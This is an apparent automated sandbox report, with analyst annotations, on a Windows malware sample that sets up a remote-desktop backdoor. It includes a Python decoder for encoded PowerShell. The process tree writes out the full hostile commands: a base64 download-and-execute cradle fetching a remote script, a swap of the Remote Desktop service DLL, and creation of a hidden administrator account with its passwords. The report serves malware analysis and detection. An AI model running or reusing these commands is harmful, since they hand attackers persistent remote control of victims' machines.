Resubmissions

submitted           task id              score
02-09-2021 16:57    210902-vgpzjadhhn    10
02-09-2021 16:25    210902-tw1h5sage4    10
02-09-2021 11:31    210902-9dk89x9wb2    10
14-08-2021 13:56    210814-xdxpv1yk2x    10

Analysis
max time kernel:   1665s
max time network:  1733s
platform:          windows10_x64
resource:          win10v20210408
submitted:         02-09-2021 16:57

Static task:      static1
Behavioral task:  behavioral1, sample 472208d7ba18d4c14b7e90b9db5d6feb.exe, resource win7v20210408
Behavioral task:  behavioral2, sample 472208d7ba18d4c14b7e90b9db5d6feb.exe, resource win10v20210408
(The signatures, IoCs and process tree below are from behavioral2; the yara resource paths are prefixed behavioral2/.)

General

Target:  472208d7ba18d4c14b7e90b9db5d6feb.exe
Size:    5.9MB
MD5:     472208d7ba18d4c14b7e90b9db5d6feb
SHA1:    ff24cc43998ff99e61b1a838e1d51c4888498935
SHA256:  ae1c9d454905ed43654f99b1ea1e8ecc3ae08eb75c3860f46b285ce724ae5e4d
SHA512:  9ce72c4da799273ae13008c0033c3d0638f224042ae3bb7910ffb5f59a64babbcd8039468b0a94b8fa5f3192f543a59f493878ade5233d9958d874d59a1e1a15
Malware Config

Extracted: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
(This is the URL inside the base64/UTF-16LE -enc argument of the powershell.exe process PID 3920 in the process tree; decoded, that argument is IEX (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1"), a download-and-execute cradle. The nine network requests attributed to PID 3920 under Signatures are what that cradle and the script it pulls in produced.)
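The config extraction above is a mechanical step worth having as a reusable tool. The following is an added example, not part of the sandbox report: it decodes a PowerShell -EncodedCommand argument (base64 over the UTF-16LE script text), pulls out the URLs it references, and checks for the IEX-plus-download pattern. SAMPLE_CMDLINE reuses the -enc blob the report recorded for powershell.exe PID 3920; the function names, regular expressions and the second, constructed command line in the test are this example's own and not from the report.

```python
"""Decode a PowerShell -EncodedCommand argument and pull out the URL(s) it calls.

Added example, not part of the sandbox report. SAMPLE_CMDLINE reuses the -enc
blob recorded for powershell.exe PID 3920 in this report; the function names
and regexes are this example's own.
"""
import base64
import re
from typing import List, Optional

# -enc is base64 over the UTF-16LE bytes of the script. PowerShell accepts any
# unambiguous prefix of -EncodedCommand; the common short forms are handled here.
# "-ep bypass" does not match because the flag must be followed by whitespace.
ENC_FLAG = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s\"'()]+", re.IGNORECASE)

# Command line of powershell.exe PID 3920 as recorded in the report.
SAMPLE_CMDLINE = (
    "powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc "
    "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBk"
    "AG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgA"
    "dQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABl"
    "AC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA"
)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script text, or None if the command line carries no -enc blob."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    b64 = m.group(1)
    b64 += "=" * (-len(b64) % 4)        # some loaders strip the base64 padding
    return base64.b64decode(b64).decode("utf-16-le")


def extract_urls(script: str) -> List[str]:
    """URLs referenced by the decoded script, in order of appearance."""
    return URL_RE.findall(script)


def is_download_cradle(script: str) -> bool:
    """True for the IEX + web-download pattern: fetch remote text and run it in-process."""
    s = script.lower()
    runs_text = "iex" in s or "invoke-expression" in s
    fetches = any(k in s for k in ("downloadstring", "downloadfile", "invoke-webrequest", "iwr "))
    return runs_text and fetches


if __name__ == "__main__":
    script = decode_encoded_command(SAMPLE_CMDLINE)
    print(script)
    print(extract_urls(script), is_download_cradle(script))
```

Run over the report's blob this yields the one-liner quoted under Malware Config and the single raw.githubusercontent.com URL; the cradle check is a coarse string heuristic, so treat it as a triage hint rather than a verdict.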
Signatures

Grants admin privileges  (1 TTPs)
  Uses net.exe to modify the user's privileges.

Blocklisted process makes network request  (9 IoCs)
  flow  pid   process
  17    3920  powershell.exe
  19    3920  powershell.exe
  20    3920  powershell.exe
  21    3920  powershell.exe
  23    3920  powershell.exe
  25    3920  powershell.exe
  27    3920  powershell.exe
  29    3920  powershell.exe
  31    3920  powershell.exe

Modifies RDP port number used by Windows  (1 TTPs)

Sets DLL path for service in the registry  (2 TTPs)
UPX yara match on dropped files  (2 IoCs)
  resource                                       yara_rule
  behavioral2/files/0x000500000001ab25-351.dat   upx
  behavioral2/files/0x000600000001ab26-352.dat   upx
Loads dropped DLL  (2 IoCs)
  pid   process
  2052  Process not Found
  2052  Process not Found
  (The sandbox did not resolve the name of PID 2052; only the load of a dropped DLL into it was recorded.)
Drops file in Program Files directory  (4 IoCs)
  description                   ioc                                                                         process
  File opened for modification  C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT    powershell.exe
  File opened for modification  C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI    powershell.exe
  File opened for modification  C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT  powershell.exe
  File opened for modification  C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI  powershell.exe
Drops file in Windows directory  (19 IoCs)
  description                   ioc                                                                                                process
  File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat          powershell.exe
  File created                  C:\Windows\branding\wupsvc.jpg                                                                     powershell.exe
  File opened for modification  C:\Windows\branding\mediasvc.png                                                                   powershell.exe
  File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_mrbjh4nt.5sl.psm1  powershell.exe
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC7BC.tmp                                        powershell.exe
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC7FC.tmp                                        powershell.exe
  File opened for modification  C:\Windows\branding\wupsvc.jpg                                                                     powershell.exe
  File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_o5pexc1t.zjm.ps1  powershell.exe
  File created                  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP                                       powershell.exe
  File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive  powershell.exe
  File created                  C:\Windows\branding\mediasrv.png                                                                   powershell.exe
  File opened for modification  C:\Windows\branding\ShellBrd                                                                       powershell.exe
  File opened for modification  C:\Windows\branding\mediasrv.png                                                                   powershell.exe
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC80D.tmp                                        powershell.exe
  File created                  C:\Windows\branding\mediasvc.png                                                                   powershell.exe
  File opened for modification  C:\Windows\branding\Basebrd                                                                        powershell.exe
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC73D.tmp                                        powershell.exe
  File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIC79C.tmp                                        powershell.exe
  File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log  powershell.exe
  (The .png/.jpg names under C:\Windows\branding are not images: mediasrv.png is the path the process tree writes to HKLM\...\services\TermService\parameters\ServiceDLL, so it is loaded by the Remote Desktop Services svchost as the terminal services DLL. The paths under ServiceProfiles\NetworkService and the __PSScriptPolicyTest_*.ps1 probes show a later powershell.exe running as NETWORK SERVICE.)
Modifies data under HKEY_USERS  (64 IoCs; the report lists at most 64)
  All paths below are relative to \REGISTRY\USER\S-1-5-20\Software, the hive of NT AUTHORITY\NETWORK SERVICE (S-1-5-20); consistent with the NetworkService profile drops above, this is the second-stage powershell.exe (PID 3920) and WMIC.exe (PID 2816) running in that context after the first stage added NETWORK SERVICE to Administrators. The writer is powershell.exe unless marked otherwise.

  Key created       Policies\Microsoft\SystemCertificates\CA\CTLs
  Set value (str)   Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\
  Set value (int)   Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912"
  Set value (str)   Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\
  Set value (str)   Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer"
  Key created       Policies\Microsoft\SystemCertificates\Disallowed\Certificates
  Key created       Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs
  Key created       Classes\Local Settings\MuiCache\16\52C64B7E
  Set value (str)   Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\
  Key created       Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map
  Key created       Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
  Set value (int)   Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3"
  Key created       Microsoft\SystemCertificates\Disallowed
  Key created       Microsoft\SystemCertificates\Root\CTLs
  Set value (str)   Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data."
  Set value (int)   Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3"
  Key created       Microsoft\Advanced INF Setup
  Set value (data)  Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000
  Key created       Microsoft\Windows
  Set value (int)   Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0"
  Set value (int)   Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"
  Set value (int)   Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"
  Key created       Policies\Microsoft\SystemCertificates\Disallowed\CRLs
  Key created       Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing
  Set value (str)   Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."
  Set value (int)   Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1"
  Key created       Microsoft\SystemCertificates\trust
  Key created       Policies\Microsoft\SystemCertificates\Disallowed\CTLs
  Set value (str)   Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\
  Set value (int)   Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"
  Key created       Microsoft\SystemCertificates\CA\CRLs
  Key created       Microsoft\SystemCertificates\CA\CTLs
  Set value (str)   Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\
  Set value (str)   Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481"
  Key created       Microsoft\SystemCertificates\TrustedPeople\CTLs
  Set value (str)   Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag,"
  Set value (int)   Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3"
  Key created       Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains
  Set value (int)   Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1"
  Key created       Policies\Microsoft\SystemCertificates\trust\CRLs
  Key created       Microsoft\Windows\CurrentVersion\Internet Settings\Zones
  Set value (str)   Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet"
  Set value (int)   Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3"
  Key created       Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones
  Set value (str)   Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones"
  Set value (int)   Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3"
  Set value (int)   Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1"
  Set value (int)   Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33"
  Set value (str)   Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481"
  Set value (str)   Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]"
  Key created       Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
  Set value (int)   Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0"
  Set value (int)   Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0"
  Key created       Policies\Microsoft\SystemCertificates\Disallowed
  Key created       Microsoft\SystemCertificates\trust\Certificates
  Key created       Microsoft
  Set value (int)   Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219"
  Key created       Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\   (WMIC.exe)
  Set value (str)   Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer"
  Set value (str)   Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425"
  Key created       Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates
  Key created       Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
  Set value (str)   Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]"
  Set value (int)   Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3"
Modifies registry key  (1 TTPs, 1 IoCs)
  pid   process
  1592  reg.exe
  (This is the reg.exe in the process tree that sets HKLM\system\currentcontrolset\services\TermService\parameters\ServiceDLL to C:\Windows\branding\mediasrv.png.)

Runs net.exe
Script User-Agent  (4 IoCs)
  Uses user-agent string associated with script host/environment.
  description            flow  ioc
  HTTP User-Agent header  19    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header  20    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header  21    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header  23    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: EnumeratesProcesses  (18 IoCs)
  pid   process         occurrences
  3144  powershell.exe  3
  2484  powershell.exe  3
  732   powershell.exe  3
  2784  powershell.exe  3
  3144  powershell.exe  3
  3920  powershell.exe  3

Suspicious behavior: LoadsDriver  (2 IoCs)
  pid  process
  608  Process not Found
  608  Process not Found
  (The sandbox did not resolve the name of PID 608.)
Suspicious use of AdjustPrivilegeToken  (64 IoCs; the report lists at most 64, so the last process's list is cut off)
  pid   process                               privileges enabled (Token:)
  568   472208d7ba18d4c14b7e90b9db5d6feb.exe  SeDebugPrivilege
  3144  powershell.exe                        SeDebugPrivilege
  2484  powershell.exe                        SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36  (22 entries)
  732   powershell.exe                        the same 22 entries as PID 2484, in the same order
  2784  powershell.exe                        SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege  (18 entries, list truncated at the 64-entry cap)
  (The numeric tokens 33 to 36 are privilege LUIDs the sandbox did not name: SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege and SeDelegateSessionUserImpersonatePrivilege. Enabling the whole set at once is the pattern of a process elevating every privilege its admin token holds rather than the one it needs.)
Suspicious use of WriteProcessMemory  (64 IoCs; every pair below was recorded twice, giving 32 distinct source/target pairs)
  source pid  source process                        target pid  procid_target  events
  568         472208d7ba18d4c14b7e90b9db5d6feb.exe  3144        75             2
  3144        powershell.exe                        496         77             2
  496         csc.exe                               760         78             2
  3144        powershell.exe                        2484        81             2
  3144        powershell.exe                        732         84             2
  3144        powershell.exe                        2784        87             2
  3144        powershell.exe                        3560        89             2
  3144        powershell.exe                        1592        90             2
  3144        powershell.exe                        2776        91             2
  3144        powershell.exe                        2172        92             2
  2172        net.exe                               2972        93             2
  3144        powershell.exe                        732         94             2
  732         cmd.exe                               1192        95             2
  1192        cmd.exe                               3852        96             2
  3852        net.exe                               3984        97             2
  3144        powershell.exe                        2792        98             2
  2792        cmd.exe                               2912        99             2
  2912        cmd.exe                               3864        100            2
  3864        net.exe                               3264        101            2
  2268        cmd.exe                               2900        105            2
  2900        net.exe                               3168        106            2
  3832        cmd.exe                               2476        109            2
  2476        net.exe                               3560        110            2
  1860        cmd.exe                               4044        113            2
  4044        net.exe                               756         114            2
  1644        cmd.exe                               1420        117            2
  1420        net.exe                               1504        118            2
  3836        cmd.exe                               3156        121            2
  3156        net.exe                               3752        122            2
  2248        cmd.exe                               188         125            2
  188         net.exe                               3972        126            2
  2484        cmd.exe                               2244        129            2
Processes

The leading digit is the depth the sandbox recorded (1 = no recorded parent); "cmd:" is the command line, and the dashed items are the signatures attached to that process. PIDs are reused during the run as short-lived processes exit (732, 2484, 2268, 188, 2792, 3560 and 3864 each appear for more than one process), so correlate by parent, child and command line rather than by PID alone.

1  C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe (PID 568)
   cmd: "C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe"
   - Suspicious use of AdjustPrivilegeToken
   - Suspicious use of WriteProcessMemory
  2  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3144)
     cmd: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
     - Drops file in Windows directory
     - Suspicious behavior: EnumeratesProcesses
     - Suspicious use of AdjustPrivilegeToken
     - Suspicious use of WriteProcessMemory
    3  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (PID 496)
       cmd: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\khb00ypm\khb00ypm.cmdline"
       - Suspicious use of WriteProcessMemory
      4  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (PID 760)
         cmd: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6363.tmp" "c:\Users\Admin\AppData\Local\Temp\khb00ypm\CSC662AA544276048D0A04263C9CC1ECCAF.TMP"
    3  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2484)
       cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
       - Suspicious behavior: EnumeratesProcesses
       - Suspicious use of AdjustPrivilegeToken
    3  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 732)
       cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
       - Suspicious behavior: EnumeratesProcesses
       - Suspicious use of AdjustPrivilegeToken
    3  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2784)
       cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
       - Suspicious behavior: EnumeratesProcesses
       - Suspicious use of AdjustPrivilegeToken
    3  C:\Windows\system32\reg.exe (PID 3560)
       cmd: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
       (0x1C21 is decimal 7201: RDP is moved off 3389.)
    3  C:\Windows\system32\reg.exe (PID 1592)
       cmd: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
       - Modifies registry key
       (Replaces the Remote Desktop Services DLL with the dropped C:\Windows\branding\mediasrv.png.)
    3  C:\Windows\system32\reg.exe (PID 2776)
       cmd: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3  C:\Windows\system32\net.exe (PID 2172)
       cmd: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
       - Suspicious use of WriteProcessMemory
      4  C:\Windows\system32\net1.exe (PID 2972)
         cmd: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3  C:\Windows\system32\cmd.exe (PID 732)
       cmd: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
       - Suspicious use of WriteProcessMemory
      4  C:\Windows\system32\cmd.exe (PID 1192)
         cmd: cmd /c net start rdpdr
         - Suspicious use of WriteProcessMemory
        5  C:\Windows\system32\net.exe (PID 3852)
           cmd: net start rdpdr
           - Suspicious use of WriteProcessMemory
          6  C:\Windows\system32\net1.exe (PID 3984)
             cmd: C:\Windows\system32\net1 start rdpdr
    3  C:\Windows\system32\cmd.exe (PID 2792)
       cmd: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
       - Suspicious use of WriteProcessMemory
      4  C:\Windows\system32\cmd.exe (PID 2912)
         cmd: cmd /c net start TermService
         - Suspicious use of WriteProcessMemory
        5  C:\Windows\system32\net.exe (PID 3864)
           cmd: net start TermService
           - Suspicious use of WriteProcessMemory
          6  C:\Windows\system32\net1.exe (PID 3264)
             cmd: C:\Windows\system32\net1 start TermService
    3  C:\Windows\system32\cmd.exe (PID 2268)
       cmd: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3  C:\Windows\system32\cmd.exe (PID 188)
       cmd: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

The csc.exe/cvtres.exe pair under PID 3144 is what Add-Type produces when a script compiles inline C#; the three `-Version 5.1 -s -NoLogo -NoProfile` children are the server-mode hosts PowerShell spawns for background jobs. The remaining trees have no recorded parent; they start after the first tree has swapped the TermService DLL and started the service.

1  C:\Windows\System32\cmd.exe (PID 2268)
   cmd: cmd /C net.exe user WgaUtilAcc 000000 /del
   - Suspicious use of WriteProcessMemory
  2  C:\Windows\system32\net.exe (PID 2900)
     cmd: net.exe user WgaUtilAcc 000000 /del
     - Suspicious use of WriteProcessMemory
    3  C:\Windows\system32\net1.exe (PID 3168)
       cmd: C:\Windows\system32\net1 user WgaUtilAcc 000000 /del

1  C:\Windows\System32\cmd.exe (PID 3832)
   cmd: cmd /C net.exe user WgaUtilAcc 1fp0fXTo /add
   - Suspicious use of WriteProcessMemory
  2  C:\Windows\system32\net.exe (PID 2476)
     cmd: net.exe user WgaUtilAcc 1fp0fXTo /add
     - Suspicious use of WriteProcessMemory
    3  C:\Windows\system32\net1.exe (PID 3560)
       cmd: C:\Windows\system32\net1 user WgaUtilAcc 1fp0fXTo /add

1  C:\Windows\System32\cmd.exe (PID 1860)
   cmd: cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
   - Suspicious use of WriteProcessMemory
  2  C:\Windows\system32\net.exe (PID 4044)
     cmd: net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
     - Suspicious use of WriteProcessMemory
    3  C:\Windows\system32\net1.exe (PID 756)
       cmd: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

1  C:\Windows\System32\cmd.exe (PID 1644)
   cmd: cmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
   - Suspicious use of WriteProcessMemory
  2  C:\Windows\system32\net.exe (PID 1420)
     cmd: net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
     - Suspicious use of WriteProcessMemory
    3  C:\Windows\system32\net1.exe (PID 1504)
       cmd: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD

1  C:\Windows\System32\cmd.exe (PID 3836)
   cmd: cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
   - Suspicious use of WriteProcessMemory
  2  C:\Windows\system32\net.exe (PID 3156)
     cmd: net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
     - Suspicious use of WriteProcessMemory
    3  C:\Windows\system32\net1.exe (PID 3752)
       cmd: C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD

1  C:\Windows\System32\cmd.exe (PID 2248)
   cmd: cmd /C net.exe user WgaUtilAcc 1fp0fXTo
   - Suspicious use of WriteProcessMemory
  2  C:\Windows\system32\net.exe (PID 188)
     cmd: net.exe user WgaUtilAcc 1fp0fXTo
     - Suspicious use of WriteProcessMemory
    3  C:\Windows\system32\net1.exe (PID 3972)
       cmd: C:\Windows\system32\net1 user WgaUtilAcc 1fp0fXTo

1  C:\Windows\System32\cmd.exe (PID 2484)
   cmd: cmd.exe /C wmic path win32_VideoController get name
   - Suspicious use of WriteProcessMemory
  2  C:\Windows\System32\Wbem\WMIC.exe (PID 2244)
     cmd: wmic path win32_VideoController get name

1  C:\Windows\System32\cmd.exe (PID 1508)
   cmd: cmd.exe /C wmic CPU get NAME
  2  C:\Windows\System32\Wbem\WMIC.exe (PID 2816)
     cmd: wmic CPU get NAME
     - Modifies data under HKEY_USERS

1  C:\Windows\System32\cmd.exe (PID 1192)
   cmd: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2  C:\Windows\system32\cmd.exe (PID 2096)
     cmd: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3920)
       cmd: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
       (decoded -enc argument: IEX (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1"))
       - Blocklisted process makes network request
       - Drops file in Program Files directory
       - Drops file in Windows directory
       - Modifies data under HKEY_USERS
       - Suspicious behavior: EnumeratesProcesses

1  C:\Windows\System32\cmd.exe (PID 2792)
   cmd: cmd.exe /C net user wgautilacc 111213&net user wgautilacc /active:yes
